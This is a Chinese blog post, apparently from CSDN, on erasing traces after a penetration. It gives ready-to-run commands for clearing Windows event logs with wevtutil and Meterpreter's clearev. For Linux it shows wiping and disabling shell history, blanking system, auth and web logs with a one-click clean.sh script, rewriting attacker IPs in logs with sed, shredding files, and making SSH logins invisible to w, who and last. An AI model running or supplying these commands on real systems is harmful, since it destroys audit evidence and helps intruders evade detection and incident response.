后渗透阶段清理痕迹方式

已于 2024-04-07 08:51:11 修改
阅读量848 收藏 20
点赞数 21
分类专栏: other 文章标签: web安全
于 2024-03-15 10:28:10 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_61475980/article/details/136729225
版权

windows

1.有远程桌面权限时手动删除日志:

事件查看器-清除日志

2.wevtutil工具命令行清除:

wevtutil el             列出系统中所有日志名称
wevtutil cl system      清理系统日志
wevtutil cl application 清理应用程序日志
wevtutil cl security    清理安全日志

wevtutil epl system C:\System_log.evtx    将System日志导出到文件C:\System_log.evtx

3.meterperter自带清除日志功能:

clearev 清除windows中的应用程序日志、系统日志、安全日志

linux

1.清除历史命令记录

histroy -r          #删除当前会话历史记录
history -c          #删除内存中的所有命令历史
history -w          #将内存中历史命令写入.bash_history  
echo > .bash_history   #删除历史文件中的内容
unset HISTORY HISTFILE HISTSAVE HISTZONE HISTORY HISTLOG; export HISTFILE=/dev/null; export HISTSIZE=0; export HISTFILESIZE=0
#设置不记录history
source .bashrc       #重新加载一下配置文件复原

2.日志清理

完全删除日志文件
echo > filename

删除当天日志
sed  -i '/当天日期/'d  filename       #匹配字符串删除

修改ip
将所有170.170.64.17ip替换为127.0.0.1
sed -i 's/170.170.64.17/127.0.0.1/g' filename

shred命令
实现安全的从硬盘上擦除数据,默认覆盖3次,通过 -n指定数据覆盖次数
shred -f -u -z -v -n 8 1.txt

一键化脚本 

clean.sh

#!/usr/bin/bash
echo > /var/log/syslog
echo > /var/log/messages
echo > /var/log/httpd/access_log
echo > /var/log/httpd/error_log
echo > /var/log/xferlog
echo > /var/log/secure
echo > /var/log/auth.log
echo > /var/log/user.log
echo > /var/log/wtmp
echo > /var/log/lastlog
echo > /var/log/btmp
echo > /var/run/utmp
rm ~/./bash_history
history -c

/var/run/utmp 记录现在登入的用户
/var/log/wtmp 记录用户所有的登入和登出
/var/log/lastlog 记录每一个用户最后登入时间
/var/log/btmp 记录错误的登入尝试
/var/log/auth.log 需要身份确认的操作
/var/log/secure 记录安全相关的日志信息
/var/log/maillog 记录邮件相关的日志信息
/var/log/message 记录系统启动后的信息和错误日志
/var/log/cron 记录定时任务相关的日志信息
/var/log/spooler 记录UUCP和news设备相关的日志信息
/var/log/boot.log 记录守护进程启动和停止相关的日志消息

last -f wtmp   它是一个二进制文件

3.隐藏远程SSH登陆记录

隐身登录系统,不会被w、who、last等指令检测到

ssh -T root@192.168.0.1 /bin/bash -i

不记录ssh公钥在本地.ssh目录中

ssh -o UserKnownHostsFile=/dev/null -T user@host /bin/bash –i
 

处理网站日志

iis apache niginx等等

access.log等等

参考

后渗透阶段清理痕迹方式总结 - 御用闲人 - 博客园 (cnblogs.com)

内网渗透系列:痕迹清理方法小结_nsa danderspiritz-CSDN博客

『 』785
关注
  • 21
    点赞
  • 20
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
linux渗透后清除日志,后渗透阶段清理痕迹方式总结
weixin_42515302的博客
05-05 1663
一、概述:在渗透完成之后,为了减少被发现和追溯的概率,攻击者有必要清除自己的攻击痕迹,本文分别对windows和linux上清理痕迹方式做一个总结。二、windows有远程桌面权限时手动删除日志:开始-程序-管理工具-计算机管理-系统工具-事件查看器-清除日志wevtutil工具命令行清除:wevtutil el 列出系统中所有日志名称wevtutil cl system...
linux后渗透痕迹清除
The current road is different, love needs to distinguish between right and wrong
11-20 3860
历史记录清除 Bash、shell、终端将当前会话中使用的命令列表保存在内存中,因此必须对其进行清理。 history用于命令查看当前历史记录。 环境变量:HISTFILE 查找history命令文件存储路径: echo $HISTFILE #返回当前用户history命令存储文件路径 删除变量: unset HISTFILE 这时候在使用一次"echo HISTFILE"将返回为空。 为了防止历史命令被保存,也可以将其发送到/dev/null HISTFILE=...
渗透阶段清理痕迹方式总结
明哥哥知识分享
03-17 789
一、前言 在渗透完成之后,为了减少被发现和追溯的概率,攻击者有必要清除自己的攻击痕迹,本文分别对windows和linux上清理痕迹方式做一个总结。 二、windows 有远程桌面权限时手动删除日志: 开始-程序-管理工具-计算机管理-系统工具-事件查看器-清除日志 wevtutil: wevtutil el 列出系统中所有日志名称 wevtutil cl system 清理系统日志 wevtutil cl application 清理应用程序日志 wevtutil cl
浅谈在渗透测试中如何清理痕迹-网络安全(黑客)自学
MachineGunJoe666
04-29 185
渗透测试中,清除痕迹可以很好的保护自己。在Linux系统中,如何有效的清除使用痕迹呢?不妨看看这篇文章吧!
渗透-痕迹清理
qq_44657899的博客
11-12 828
修改文件时间戳 有时我们登陆到服务器,对它的⽂件进行了修改,修改后的⽂件的时间戳会更新到最新的 时间,那么这样就会引起管理员的注意。 因此我们需要吧那个⽂件的时间戳给修改成其他时间! Powershell命令 $(DATE) 表示当前日期和时间; $(Get-Date) 同$(DATE),表示当前日期和时间; $(Get-Date "MM/DD/YYYY HH24:MI:SS") 表示指定的日期和时间; $(Get-Item abc.txt) 表示获取文件的句柄; $(Get-Item abc.txt).c
渗透测试入门10之痕迹清理
鹿鸣天涯
04-03 2122
渗透测试入门10之痕迹清理 Windows日志清除 获取日志分类列表: wevtutil el >1.txt 获取单个日志类别的统计信息: eg. wevtutil gli "windows powershell" 回显: creationTime: 2016-11-28T06:01:37.986Z lastAccessTime: 2016-11-28T06:01:37.98...
渗透清除目标主机入侵痕迹
aod83029的博客
10-15 139
修改lastlog里面的ip,这个就是记录最后登入的ip(需要root权限才可以修改) 转载于:https://www.cnblogs.com/zheh/p/4881343.html
渗透软件cs4中文版.zip
12-03
7. **监控与日志清理**:工具可能会包含监控用户活动和清除操作痕迹的特性,以保持长期的未被察觉。 8. **虚拟机检测**:检测目标系统是否运行在虚拟环境中,因为这可能会影响攻击策略。 9. **键盘记录与屏幕截取*...
渗透测试的实施流程:明确目标、信息收集、漏洞发现、漏洞验证、后渗透测试等
08-19
在这个阶段渗透测试小组清除中间数据,清理掉上传的webshell后门,删除上传、下载的数据。 7. 报告编写 在这个阶段渗透测试小组根据测试的结果编写渗透测试报告。报告中包括漏洞成因、验证过程和带来危害的...
信息系统渗透测试方案.pdf
03-28
3. **后攻击阶段**:完成攻击后,评估损害程度,清理痕迹,并研究如何防止类似攻击再次发生。 4. **其它手法**:可能涉及社会工程学、物理访问控制测试等多维度的攻击方式。 【操作中的注意事项】 1. **资料提供**...
Metasploit渗透测试指南_渗透测试_metasploit_
10-04
同时,为了维护合法性和道德性,必须确保在测试结束后清理所有痕迹,关闭任何打开的连接,并恢复系统到原始状态。 7. **学习与进阶** 学习Metasploit不仅仅是掌握基本用法,还包括了解其工作原理、编写自定义模块...
渗透测试流程.zip
04-06
- **隐藏踪迹**:清理日志,隐藏渗透活动的痕迹。 7. **报告与修复建议** - **编写报告**:详细记录整个测试过程,包括发现的漏洞、利用步骤、影响和建议。 - **安全建议**:为客户提供修复方案,指导如何加固...
渗透测试之痕迹清除
qq_29864185的博客
07-01 3350
痕迹清除 当我们达到了目的之后,有时候只是为了黑入网站挂黑页,炫耀一下;或者在网站留下一个后门,作为肉鸡,没事的时候上去溜达溜达;亦或者挂入挖矿木马;但是大家千万不要干这些事,这些都是违法的! 我这里只是教大家在渗透进去之后如何清除我们留下的一部分痕迹,并不能完全清除,完全清除入侵痕迹是不可能的!主要是增加管理员发现入侵者的时间成本和人力成本。只要管理员想查,无论你怎么清除,还是能查到的。 最主要还是要以隐藏自身身份为主,最好的手段是在渗透前挂上代理,然后在渗透痕迹清除。 Windows系统
渗透篇:清理windows入侵痕迹总结【详细】
Vdieoo的博客
12-03 6115
当你的才华 还撑不起你的野心时 那你就应该静下心来学习 目录 清理windows入侵痕迹 0x01 前言 了解为什么需要清除入侵痕迹? 一、设置跳板 二、必不可少的跳板 三、代理服务器简介 1)http代理服务器 2)Sock5代理服务器 3)VPN代理服务器 四、使用Tor隐身 了解需要删除哪些日志? 1.默认提供的日志 2.防火墙日志 3.IIS日志 4、netstat-an表示什么意思? 0x02 清除Windows日志 0x01.1异常场景解决方案 0...
网络安全防御 -- 双机热备和带宽管理综合实验
rrl18215821889的博客
07-16 553
12,对现有网络进行改造升级,将当个防火墙组网改成双机热备的组网形式,做负载分担模式,游客区和DMZ区走FW3,生产区和办公区的流量走FW1。13,办公区上网用户限制流量不超过100M,其中销售部人员在其基础上限制流量不超过60M,且销售部一共10人,每人限制流量不超过6M。16,外网访问内网服务器,下行流量不超过40M,DMZ中的每台服务器限制对外提供的最大下行带宽不超过20M。做负载分担模式,生产区和办公区的流量走FW1,游客区和DMZ区走FW3。配置g0/0/0ip和开启服务。办公区销售部带宽策略;
网络安全-网络安全及其防护措施8
LS_Ai的博客
07-17 1134
数据中心网络架构是指数据中心内部网络的设计和结构,其目的是提供高性能、高可用性和高扩展性的网络连接。合理的数据中心网络架构能够支持大规模数据处理和传输,满足数据中心的业务需求,提高整体运营效率。负载均衡是一种分配网络流量和计算任务的方法,旨在优化资源利用率、提高系统性能和增强服务可用性。通过将请求分配到多个服务器上,负载均衡避免了单点故障和性能瓶颈,确保系统稳定和高效运行。网络安全策略是指为保护网络和信息系统的安全而制定的一系列规则和措施。
Web安全:未验证的重定向和转发.
最新发布
网络安全领域___专研者.
07-19 545
未验证的重定向和转发漏洞是一种常见的Web安全漏洞,它允许攻击者将用户重定向到一个恶意的URL,而不是预期的安全URL。这种漏洞通常发生在应用程序处理重定向和转发请求时,未能对目标URL进行适当的验证和过滤。
网络安全防御【防火墙双机热备带宽管理综合实验】
miss_copper的博客
07-16 1241
游客区人员不固定,不允许访问DMZ区和生产区,统一使用Guest用户登录,密码Admin@123,游客仅有访问公司门户网站和上网的权利,门户网站地址10.0.3.10。5、生产区访问DMZ区时,需要进行protal认证,设立生产区用户架构,至少包含三个部门,每个部门三个用户,用户统一密码openlab123,12,对现有网络进行改造升级,将当个防火墙组网改成双机热备的组网形式,做负载分担模式,游客区和DMZ区走FW3,生产区和办公区的流量走FW1。链路开启过载保护,保护阈值80%;
.在后渗透阶段完成后,需要清楚所有的操作痕迹,清楚痕迹的命令是
06-10
渗透阶段完成后,为了避免被检测和追踪,需要清除所有的操作痕迹。清除痕迹可以使用以下命令: ``` meterpreter > clearev ``` 该命令可以清除所有事件日志,包括系统日志、安全日志和应用程序日志等。需要注意的是,该命令只能清除Meterpreter会话期间产生的事件日志,无法清除之前的事件日志,因此在使用该命令前应尽可能地减少对目标系统的操作,以避免留下痕迹。此外,还应考虑使用其他清除痕迹的方法,如删除日志文件、清除缓存等。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值